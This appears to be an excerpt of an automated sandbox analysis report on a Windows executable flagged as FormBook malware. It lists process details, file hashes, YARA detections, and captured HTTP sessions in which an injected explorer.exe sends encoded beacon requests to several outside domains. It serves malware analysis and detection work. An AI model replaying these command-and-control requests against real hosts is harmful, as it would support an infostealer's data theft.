ba ea 9c bd ad cc 6b 38 f5 01 8d 8a ad 8a 83 d1 b8 c9 9d a8 a5 f9 f5 91 5b 36 4f a0 c8 e6 3e 82 d7 e2 72 65 ef c1 a6 2d 1b 87 7d bb 6b 80 1c 52 67 e8 49 08 9c 69 30 79 3b ea c8 0e 19 14 9b 48 80 f1 a9 48 cb 25 02 0d 8f df 2e b4 5f f9 17 15 f8 8b b1 6b b1 da c0 ae b7 9c 71 79 b6 ba bd fc e1 5c d6 75 1d 15 8e 2c 4f d1 e5 ab fe 65 7e 9c 3e 38 c1 20 64 b7 cd 05 27 e4 5a d0 fb 85 d4 d5 f5 f7 b8 57 d0 a8 10 e3 0b bd d5 6d c3 53 fd
                                                Data Ascii: $K}rcC.C-`< 7^\\o=xw8~v{\7O!/aSrZh<e3@\6JiO'uFr{/SpMgJOZM]eZE=wet7`Jk8sx~di#k80,Ng9y$="9P mBh5D5*`<;HH$-_kQ{y\u,u~> d'ZWmSF<"K@sm~6:"y<Q\ 'Ve{McC2'm;%qFQ<Ky~?8uV]MT8a8!X19ZH:rtYeR{^X[/byC}`C,Zg1(\t[A:CYfFya2njkB64:)"U&_zg]G;C[{sIRq9|i|0$468rt -Fkm@5^JIb`<{zHK(FC*0.GCpErodS5d;SU,]COciv*ro#~R**yZe(h/0&F\6JiO'uFr{/pMiU.\)diE#m4jzKQ<-)k8[6O>re-}kRgIi0y;HH%._kqy\u,Oe~>8 d'ZWmS


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.54972123.227.38.7480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:34:59.519618988 CET1741OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1
                                                Host: www.buytgp.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:34:59.716490030 CET1742INHTTP/1.1 403 Forbidden
                                                Date: Thu, 25 Feb 2021 14:34:59 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                X-Sorting-Hat-PodId: 149
                                                X-Sorting-Hat-ShopId: 47348220054
                                                X-Dc: gcp-us-central1
                                                X-Request-ID: a7602c6c-8aa4-43ef-9205-55bf2ef16f75
                                                Set-Cookie: _shopify_fs=2021-02-25T14%3A34%3A59Z; Expires=Fri, 25-Feb-22 14:34:59 GMT; Domain=buytgp.com; Path=/; SameSite=Lax
                                                X-Download-Options: noopen
                                                X-Permitted-Cross-Domain-Policies: none
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 1; mode=block
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b36605d0000248480afa000000001
                                                Server: cloudflare
                                                CF-RAY: 6272267a2fcd2484-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 35 61 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a
                                                Data Ascii: 5af<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:04.845968008 CET5245OUTGET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.delmarranch.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:04.985801935 CET5246INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Feb 2021 14:35:04 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "60363547-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549729104.21.56.9380C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:15.562661886 CET5751OUTGET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.apkiinsurance.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:15.637638092 CET5752INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 25 Feb 2021 14:35:15 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: __cfduid=ddde661592d9bcb9b6cf9e7d17c606d9f1614263715; expires=Sat, 27-Mar-21 14:35:15 GMT; path=/; domain=.apkiinsurance.com; HttpOnly; SameSite=Lax
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Location: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 087b369f08000017828e35b000000001
                                                Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7z%2FyFE9jg2zW17FvmVo2E2dzCU%2FxKMiRAsQO46Cn0b%2F73vsEuJFIiGWPfRZbSPOL9DwHUvxB0kJymlmxmA%2Bk5GIKVYecOYHIe4IULEKRB1pcpE6zM2k%3D"}]}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 627226de79281782-FRA
                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 6b 69 69 6e 73 75 72 61 6e 63 65 2e 63 6f 6d 2f 67 7a 6a 7a 2f 3f 69 42 3d 71 6a 76 47 63 70 42 53 39 67 6e 67 66 63 63 78 77 35 51 46 74 79 2b 65 45 5a 55 56 6c 49 4b 41 76 6c
                                                Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.549730192.0.78.2580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:20.764060974 CET5753OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1
                                                Host: www.bestcroissantinlondon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:20.804835081 CET5754INHTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 162
                                                Connection: close
                                                Location: https://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS
                                                X-ac: 2.hhn _dca
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.54973194.136.40.5180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:25.975158930 CET5755OUTGET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1
                                                Host: www.thakehamwesthorsley.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:26.032011032 CET5756INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:24 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.549733146.148.189.21680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:31.477104902 CET5766OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:31.959116936 CET5767OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:32.568774939 CET5767OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:33.678253889 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:35.896950960 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:38.115953922 CET5768OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:40.335508108 CET5769OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:44.772839069 CET5771OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:53.696007013 CET5957OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1
                                                Host: www.guillemaudexcellenceauto.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.54973494.136.40.5180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Feb 25, 2021 15:35:44.252448082 CET5770OUTGET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1
                                                Host: www.karatetheokinawaway.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Feb 25, 2021 15:35:44.309845924 CET5771INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 25 Feb 2021 14:35:43 GMT
                                                Content-Type: text/html
                                                Content-Length: 793
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: dwg.exe PID: 5316 Parent PID: 5568

                                                General

                                                Start time:15:33:53
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Visual Basic
                                                Reputation:low

                                                Analysis Process: dwg.exe PID: 1544 Parent PID: 5316

                                                General

                                                Start time:15:34:05
                                                Start date:25/02/2021
                                                Path:C:\Users\user\Desktop\dwg.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x400000
                                                File size:98304 bytes
                                                MD5 hash:6A9035B7435C6AA9E6C8E31CF771E316
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
